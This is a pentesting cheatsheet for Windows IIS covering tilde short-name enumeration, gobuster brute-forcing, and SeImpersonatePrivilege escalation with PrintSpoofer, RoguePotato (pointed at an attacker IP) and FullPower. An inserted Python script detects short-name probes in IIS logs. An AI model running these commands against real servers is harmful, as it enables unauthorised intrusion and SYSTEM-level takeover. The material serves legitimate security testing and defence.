IIS
A cheatsheet for targeting Windows IIS vulnerabilities, including tilde enumeration for hidden paths and abusing SeImpersonatePrivilege for privilege escalation.
Author: BobBuilder
Tilde Enumeration
Windows IIS may expose 8.3 short names for files/folders via malformed HTTP requests:
- longname.txt → longna~1.txt
- Useful to enumerate hidden/forbidden paths
Automated Scanner
java -jar iis_shortname_scanner.jar 0 5 http://<target_ip>/
java -jar iis_shortname_scanner.jar 2 20 http://<target_ip>/
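How this kind of scanning looks from the server side, as an added example that is not part of the original cheatsheet: it reads IIS W3C log lines and counts, per client IP, the requests whose path has the shape of a short-name probe. The probe heuristic (a wildcard together with `~<digit>` in the path), the threshold and the sample log are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Heuristic (assumption): a short-name probe carries a wildcard (* or ?)
# together with "~<digit>" in the URL path. A plain 8.3 name has no wildcard.
TILDE = re.compile(r"~\d")
WILDCARD = re.compile(r"[*?]")

def parse_w3c(lines):
    """Yield one dict per request, using the log's own #Fields: header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def is_shortname_probe(uri_stem):
    """True when the decoded path contains both a wildcard and ~<digit>."""
    path = unquote(uri_stem)
    return bool(TILDE.search(path) and WILDCARD.search(path))

def suspicious_clients(lines, threshold=3):
    """Return {client_ip: probe_count} for clients at or above the threshold."""
    hits = Counter(r["c-ip"] for r in parse_w3c(lines)
                   if is_shortname_probe(r.get("cs-uri-stem", "")))
    return {ip: n for ip, n in hits.items() if n >= threshold}

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 10:00:01 GET /default.aspx - 198.51.100.7 200
2024-05-01 10:00:02 GET /*~1*/.aspx - 203.0.113.9 404
2024-05-01 10:00:02 GET /a*~1*/.aspx - 203.0.113.9 404
2024-05-01 10:00:03 OPTIONS /b%2A~1%2A/.aspx - 203.0.113.9 400
2024-05-01 10:00:04 GET /docs/REPORT~1.PDF - 198.51.100.7 200
2024-05-01 10:00:05 GET /c*~1*/.aspx - 203.0.113.9 404
""".splitlines()

if __name__ == "__main__":
    for ip, count in suspicious_clients(SAMPLE_LOG).items():
        print(f"{ip}: {count} short-name probe requests")
```

The threshold of 3 is an arbitrary starting value; tune it against the volume of a real log before alerting on it.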
Gobuster Brute Force
gobuster dir -u http://<target_ip>/ -w list.txt -x .aspx,.asp
SeImpersonatePrivilege Abuse
Overview
IIS users often run under accounts with SeImpersonatePrivilege.
Privilege Escalation Tools
PrintSpoofer
PrintSpoofer.exe -i -c cmd
RoguePotato / GodPotato / JuicyPotatoNG
RoguePotato.exe -r <attacker_ip> -p <port> -t <clsid> -e cmd.exe
FullPower (Enable Privilege)
.\FullPower.exe --enable SeImpersonatePrivilege